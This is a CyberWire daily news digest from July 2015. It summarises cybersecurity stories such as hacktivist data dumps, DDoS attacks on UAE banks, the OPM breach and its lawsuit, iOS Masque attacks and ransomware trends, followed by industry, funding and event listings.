Team GhostShell — the hacktivist crew that claims exposure of inadequate security as its mission — is back, dumping pieces of sensitive data picked up from government agencies and (especially) educational sites whose security GhostShell regards as "shoddy."
Banks in the United Arab Emirates sustain an apparently coordinated denial-of-service attack.
The Egyptian Army takes an unfortunate page from the ISIS information operations playbook, posting some two-dozen pictures of dead ISIS fighters to Facebook.
Cyber-rioting flares again between Armenia and Azerbaijan, this time with Armenian hackers leaking personal data of about 5000 Azerbaijani citizens.
As the class action lawsuit against OPM by Government employees proceeds (alleging among other things that OPM managers violated Federal law with respect to data protection) the US FBI warns businesses to prepare for more attacks emanating from China. (The Bureau doesn't say, but, as the Daily Beast puts it, "strongly implies" Chinese government responsibility for both the OPM and Anthem breaches.) War on the Rocks publishes a brief, clear account of the damage that can be done with the SF-86 data exposed at OPM.
Concerns about mobile malware continue, with FireEye outlining the potential for Masque attacks against iOS devices, and G DATA describing a rapid rise in Android exploits (many of them designed for use against financial targets).
The Angler exploit kit continues to push CrytpoWall. TorrentLocker surges in both the UK and Turkey. Ransomware-as-a-service picks up black marketshare.
Venture capitalists talk tech trends, guarantees, and cyber insurance.
A note to our readers: we'll be taking tomorrow off as we observe Independence Day (a day early, following Federal usages over here in America). The CyberWire will resume normal publication on Monday, July 6.
Today's issue includes events affecting Armenia, Azerbaijan, Brazil, China, Egypt, Iran, Kenya, Democratic Peoples Republic of Korea, Russia, Turkey, United Arab Emirates, United Kingdom, United States.
Anonymous cyber hackers hit UAE banking websites(Arabian Business) Several UAE banks were hit by a co-ordinated cyber attack, known in the trade as a distributed-denial-of-service (DDoS) attack, on Tuesday, crippling e-banking operations and websites, and leaving the unnamed institutions fearing further assaults, Arabian Business' sister website ITP.net has reported
The 9 Scariest Things that China Could Do with the OPM Security Clearance Data(War on the Rocks) The theft of the SF-86 security clearance records of millions of current, former, and prospective U.S. government employees and contractors from the Office of Personnel Management (OPM) probably has the Chinese government doing a happy dance. This data breach may affect up to 6 percent of the entire U.S. population. What use can the data be to China? Here are nine things that can now be done on an industrial scale
Three New Masque Attacks against iOS: Demolishing, Breaking and Hijacking(FireEye) In the recent release of iOS 8.4, Apple fixed several vulnerabilities including vulnerabilities that allow attackers to deploy two new kinds of Masque Attack (CVE-2015-3722/3725, and CVE-2015-3725). We call these exploits Manifest Masque and Extension Masque, which can be used to demolish apps, including system apps (e.g., Apple Watch, Health, Pay and so on), and to break the app data container
Injection Attacks on 802.11n MAC Frame Aggregation(ACM (WiSec '15)) The ability to inject packets into a network is known to be an important tool for attackers: it allows them to exploit or probe for potential vulnerabilities residing on the connected hosts. In this paper, we present a novel practical methodology for injecting arbitrary frames into wireless networks, by using the Packet-In-Packet (PIP) technique to exploit the frame aggregation mechanism introduced in the 802.11n standard. We show how an attacker can apply this methodology over a WAN — without physical proximity to the wireless network and without requiring a wireless interface card
Another example of Angler exploit kit pushing CryptoWall 3.0(Internet Storm Center) Angler exploit kit (EK) has been evolving quite a bit lately. Recently, this EK has been altering its URL patterns on a near-daily basis. The changes accumulate, and you might not recognize current traffic generated by Angler. After two weeks of vacation, I almost didn't recognize it. This diary provides two traffic examples of Angler EK as we enter July 2015
TorrentLocker Surges in the UK, More Social Engineering Lures Seen(TrendLabs Security Intelligence Blog) We've noticed a recent increase in TorrentLocker-related emails being sent to users in several countries, particularly the United Kingdom and Turkey. From the latter half of May until June 10, there was a relative lull in TorrentLocker-related emails. However, over a period of just over two weeks (June 10 to June 28), we saw a recurrence of this threat
Franchising Ransomware(Dark Reading) Ransomware-as-a-service is fueling cyberattacks. Is your organization prepared?
Cisco UCDM Platform Ships with Default, Static Password(Threatpost) A week after admitting that several of its security appliances ship with static SSH keys, Cisco warned customers on Wednesday that its Unified Communications Domain Manager platform has a default, static password for an account that carries root privileges
SAP: Juicy Target For Attackers, Opportunity For Security Research Community(HackerOne) Enterprise resource planning (ERP) suites by the likes of SAP and Oracle JD Edwards serve as the nerve center of the most business critical processes of the enterprise. They control financial planning. They support manufacturing and supply chain management. They facilitate marketing and sales activities. And they're also some of the most vulnerable systems in the enterprise. In spite of spending millions on security today, enterprises are seriously dropping the ball when it comes to their most sensitive business applications. Here's how badly: 95 percent of SAP installations contain vulnerabilities that could lead to the full compromise of an organization's business data and process
Harvard Reveals It Had An IT Breach In June Impacting 8 Colleges And Administrations(TechCrunch) A seventeenth-century university has become the victim of a twenty-first-century crime. Harvard University on Wednesday announced that on June 19, it discovered a breach in the IT systems of its Faculty of Arts and Sciences and Central Administration, currently impacting eight different schools and administrative organizations at the university
Banks: Card Breach at Trump Hotel Properties(KrebsOnSecurity) The Trump Hotel Collection, a string of luxury hotel properties tied to business magnate and now Republican presidential candidate Donald Trump, appears to be the latest victim of a credit card breach, according to data shared by several U.S.-based banks
Security Patches, Mitigations, and Software Updates
Confidence in antivirus falls to all-time low(Help Net Security) While concern for end-user risk persists, confidence is waning in traditional detection-based security solutions, such as antivirus and firewalls. Instead, interest is shifting toward prevention-based security solutions, such as endpoint threat isolation, according to a new Bromium report
Enterprise Threat Intelligence Programs are Immature(Network World) Seems like everyone is talking about threat intelligence these days. The feds are promoting public/private threat intelligence sharing across the executive and legislative branches while the industry is buzzing about threat intelligence feeds, sharing platforms, and advanced analytics
Four in five execs think conventional security is not enough for cloud environments(Cloud Tech) Earlier this week, this publication reported on a C-level study which showed a distinct lack of trust in cloud storage for fully securing corporate data. Now, a new survey from CloudPassage sheds light on the security executive perspective; 80% of security execs in North America don't believe conventional network security solutions are enough to protect their cloud computing environments
A Critical Threat(SC Magazine) Attacks on critical national infrastructure are a growing concern, not just the banking and civil infrastructure, but also control systems used in the physical delivery of services. This is set to become even more of a problem as SCADA systems become internet enabled, reports Kate O'Flaherty
US Army Seeks Leap-Ahead Cyber Defense Tech(Defense News) The US Army is seeking to equip its cyber warriors with cutting-edge networking hardware, and it is going outside the traditional acquisitions system to do it
No More Snake Oil: Why InfoSec Needs Security Guarantees(White Hat via SlideShare) Ever notice how everything in InfoSec is sold "as is"? No guarantees, no warrantees, no return policies. For some reason in InfoSec, providing customers with a form of financial coverage for their investment is seen as gimmicky, but the tides and times are changing. This talk discusses use cases on why guarantees are a must have and how guarantees benefit customers as well as InfoSec as a whole
Five Strategies for Better Cyber Protection and Defense(Menlo Ventures) Today, BitSight Technologies announces $23M in Series B funding to continue protecting businesses from cyber attacks with sophisticated cyber security ratings. At Menlo, we're proud to re-up our investment in BitSight. In fact, we're focusing $80M of our current $400M fund on cyber security investments, as attacks are an ever-increasing board-level threat to businesses today
Securing the Airways(CIO Review) Mobile communications are wide open to hacking. Encryption delivers a much needed solution
Startup BitSight Raises $23M to Advance Security-Ratings Platform Technology(The VAR Guy) Security startups have experienced a windfall of funding lately. We've told you about the cash CounterTack, Menlo Security and vArmour have all added to their wallets, and now another nascent security company BitSight Technologies — which develops a platform allowing companies to rate their own and other organizations' security — is joining the list
Level 3 Communications (LVLT) Acquires Black Lotus(Street Insider) Global telecommunications provider Level 3 Communications, Inc. (NYSE: LVLT), announced it acquired privately held Black Lotus, a provider of global Distributed Denial of Service (DDoS) mitigation services
Two companies living the life of growth(IT Pro Portal) Digital Shadows and Growth Intelligence, both Level39 and High Growth Space members, started off in humble beginnings — small teams, small spaces but big ideas
Women in IT Security: Women of influence(SC Magazine) We enlisted a team of moderators to ask a number of prominent IT security professionals about the challenges they faced as a woman entering the field, the prejudices they deal with every day and the skills they use to navigate within their business
Start with Security: A Guide for Business(Federal Trade Commission) When managing your network, developing an app, or even organizing paper files, sound security is no accident. Companies that consider security from the start assess their options and make reasonable choices based on the nature of their business and the sensitivity of the information involved. Threats to data may transform over time, but the fundamentals of sound security remain constant
The Best Defence Against Targeted Threats(Information Security Buzz) Hackers' increasing sophistication means perimeter security is failing. Organisations must switch tactics and turn to tools which can stop intruders once they're inside the network, argues Tufin's Reuven Harrison
Securing Single Points of Compromise (SPoC)(SANS Institute) Securing the Single Points of Compromise that provide central services to the institution s environment is paramount to success when trying to protect the business. (Fisk, 2014) Time Based Security mandates protection (erecting and ensuring effective controls) that last longer than the time to detect and react to a compromise. When enterprise protections fail, providing additional layered controls for these central services provides more time to detect and react. While guidance is readily available for securing
Securing SAP Systems from XSS vulnerabilities Part 3: Defense for SAP NetWeaver J2EE(ERPScan) Cross-site scripting, or XSS, is one of the most popular vulnerability in all products and in SAP products with total number of 628 vulnerabilities (almost 22% of all vulnerabilities ever found in SAP during 12 years). In the previous posts, we described the general information on XSS and how to defense SAP NetWeaver ABAP from this vulnerability. Today we will give an overview of SAP NetWeaver J2EE defence
The Quest to Rescue Security Research From the Ivory Tower(Wired) Stolen credit card numbers. Stolen passwords. The personal information of about 4 million federal workers hacked. We know all too well that computers are dreadfully insecure. And all too often, the people who could do the most to help make them more secure are stuck in academia with little connection to the real world
DARPA picks two for WAN project(C4ISR & Networks) Two companies will aid the Defense Advanced Research Projects Agency improve wide-area networks, under contracts connected to DARPA's Edge-Directed Cyber Technologies for Reliable Mission program
What if You Trained Google's Chatbot on Mein Kampf?(Wired) Google recently built a chatbot that can learn how to talk to you. Artificial intelligence researchers Oriol Vinyals and Quoc Le trained the thinking machine on reams of old movie dialogue, and it learned to carry on a pretty impressive conversation about the meaning of life
The Brazil-U.S. Cyber Relationship Is Back on Track(Council on Foreign Relations) Brazilian President Dilma Rousseff's was in Washington D.C. this week to meet with President Obama. The trip came two years after she had famously cancelled a state visit in 2013 in protest following allegations that the NSA had spied on Brazil and Rousseff personally. At the time, the Brazilian president was very public and vocal in her denunciations, calling the espionage "manifestly illegitimate" and expressing her outrage at the United Nations
Defense cyber strategy: We can and will hit back(C4ISR & Networks) The Defense Department's new cyber strategy, just over two months old, is an outline of overarching goals fleshed out with narrower objectives and plans for implementation, hits on Pentagon cyber ambitions. Perhaps chief among them: The U.S. military has the means to retaliate in the digital realm and a willingness to do so
An Unassuming Web Proposal Would Make Harassment Easier(Wired) The privacy of countless website owners is at risk, thanks to a proposal in front of the byzantine international organization at the heart of the Internet: ICANN. If adopted, the new proposal could limit access to proxy and privacy services, which protect domain registrants from having their home addresses exposed to everyone on the Internet
Litigation, Investigation, and Law Enforcement
Class-Action Suit Alleges OPM Officials Failed to Protect Employees' Data(Threatpost) A class-action lawsuit filed by a government employees' union against the Office of Personnel Management as a result of the massive data breach at OPM that affects more than 18 million people alleges that not only did the agency know about vulnerabilities in its network long before the attack, but that the agency's director and CIO both broke federal laws by ignoring directives to fix the weaknesses
National Insider Threat Special Interest Group Meeting(Laurel, Maryland, USA, July 16, 2015) Topics to be discussed at the meeting; Insider Threat Program Development & Implementation, Behavioral Indicators Of Concern, Legal Considerations When Developing & Managing An Insider Threat Program.
TakeDownCon Rocket City(Huntsville, Alabama, USA, July 20 - 21, 2015) TakeDownCon is a highly technical forum that focuses on the latest vulnerabilities, the most potent exploits, and the current security threats. The best and the brightest in the field come to share their...
CyberMontgomery 2015(Rockville, Maryland, USA, July 30, 2015) Montgomery County, Maryland, is home to the National Institute of Standards and Technology (NIST), the National Cybersecurity Center of Excellence (NCCoE), the FDA, NIH, NOAA, NRC and more than a dozen...
SPONSOR & SUPPORT
Grow your brand and reach new customers.
Grow your brand and increase your customer base by educating our audience about your products, services, and events by advertising on The CyberWire. We’ve built trust with an influential (and often hard to reach) audience of CISOs, CSOs, and other senior execs in the security space, across a wide array of industry verticals. Learn more.
Be a part of the CyberWire story.
People ask us (a lot) how they can support what we do. We have our sponsorships and services, of course, but those are not always within every supporter's financial reach, or it might just not be the right time for you to do those things. That's why we launched our new Patreon site, where we've created a wider variety of support levels, each with some new benefits. Our patrons are important to our future, and we hope you'll consider becoming one. We invite you to become part of the CyberWire story. Become a patron today.